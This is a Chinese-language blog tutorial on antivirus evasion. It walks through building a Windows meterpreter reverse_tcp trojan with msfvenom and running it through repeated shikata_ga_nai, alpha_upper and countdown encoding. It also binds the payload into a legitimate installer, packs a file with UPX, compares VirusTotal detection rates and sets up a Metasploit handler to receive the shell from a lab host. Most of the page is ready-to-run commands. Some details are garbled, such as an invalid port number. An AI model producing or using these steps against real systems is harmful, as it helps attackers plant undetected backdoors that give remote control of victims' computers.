13.1、免杀技术

攻击主机: Kali 192.168.11.106
靶机:windows server 2008 r2  192.168.11.134  x64 32位
免杀就是避免被杀掉,准确点说就是创建的攻击载荷在对方电脑上运行的时候,可能会被杀毒软件干掉,使用相关技术让载荷躲过杀毒软件的扫描。
由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等技术 ,内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀
免杀总结一下大概有以下几种方法:
  1. 编码
  2. 加壳
  3. 先生成c源码,再编译成exe
  4. 利用工具(Veil,TheFatHat等) 14、TheFatRat木马生成工具-创建后门或payload
  

1、制作常规木马

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.11.106  LPORT=5555 -f exe -o /root/Desktop/trojans.exe
2a648d8fdd8e42b9b904703e559c1ee8.png
打开杀毒引擎网站 https://www.virustotal.com查看该病毒软件:
1e44be064197477fa1e34eff9b377493.png
可以看到,检出率很高,很容易被杀毒软件识别出。
  

2、多重编码 + 木马捆绑(主程序启动后子程序随之启动)

原理:MSF编码器,功能是对攻击载荷文件进行重新的排列编码,改变可执行文件中的代码形状,避免被杀软认出。MSF编码器可以将原可执行的程序重新编码,生成一个新的二进制文件,这个文件运行以后,MSF编码器会将原始程序解码到内存中并执行。
查看msfveonom中可用的免杀编码器:msfvenom --list encoders
16784f050a1a49a58074bd42a6814255.png
这里使用管道让msfvenom对攻击载荷多重编码,先用shikata_ga_nai编码5次,接着来5次的alpha_upper编码,再来10次的countdown编码,最后使用一个百度网盘的安装包为模板进行生成才生成可执行文件。
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.11.106 lport=5555  -e x86/shikata_ga_nai -i 5 -f raw | msfvenom  -a x86 --platform windows -e x86/alpha_upper -i 5 -f raw | msfvenom  -a x86 --platform windows -e x86/countdown -i 10 -f exe -x /root/Desktop/Ximalaya-3.2.0_99B_sc100001.exe -o /root/Desktop/Trojans_1.exe
  • -p:表示使用windows/meterpreter/reverse_tcp攻击载荷;
  • -e:指定编码器,可以通过-l encoders查看所有编码器
  • -i:编码次数,多次编码理论上来讲有助于免杀
  • -f:指定MSF编码器输出的程序的格式
  • -a, –arch < architecture> 指定payload的目标架构,例如x86 | x64 | x86_64;
  • –platform < platform> 指定payload的目标平台;
  • -x, –template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中。【注意】Meatsploit 自带了用于捆绑木马的程序模板,其位置在data/templates/template.exe,虽然这个模板经常会更新,但是其仍是各大反病毒木马厂商的关注重点。为了更好地实现免杀,此处自主选择一个待捆绑程序。
2ba18b40a01340a2bbf41e6c42ccf8e4.png
打开杀毒引擎网站 https://www.virustotal.com查看该病毒软件:
fb5f96888d2342f5bcf8742803a9a9d2.png
可以看到能检测出病毒的软件减少。
  
将生成的捆绑木马发到windows主机,并且打开msf的监听模块:
用python打开一个http服务器: 
cd /home 
python -m http.server 80008
355b10f38f584531881af90d9970d9aa.png
使用命令 use exploit/multi/handler配置监听模块:
set payload windows/meterpreter/reverse_tcp  # 此处的payload一定要和上方生成的payload的是同一个模块
set lhost 192.168.11.106   # 设置监听的ip
set lport 5555   # 设置监听端口
run
靶机上执行exe程序后才会进入meterpreter会话:
fb4c05a59aa7412b83432eeaf7eccd19.png
  

3、加壳

原理:加壳是一类工具,对可执行文件中的代码和数据进行加密压缩,并将解压代码嵌入其中,当加壳的文件被运行后,解压代码会从已压缩的数据中重建原始程序并运行。UPX打包器的本质目的是反调试,防止逆向工程,而这里使用打包器的目的是为了改变后门程序的特征码。
c263257a72d64b6bb7ffb2772b011984.png
加壳:upx -5 /root/Desktop/Ximalaya-3.2.0_99B_sc100001.exe -o /root/Desktop/Trojans_2.exe
18b8f2a8389342c0bf710a05fa9007ad.png
打开杀毒引擎网站 https://www.virustotal.com查看该软件:
5969d1afba5f4027bbc4e27327632da8.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值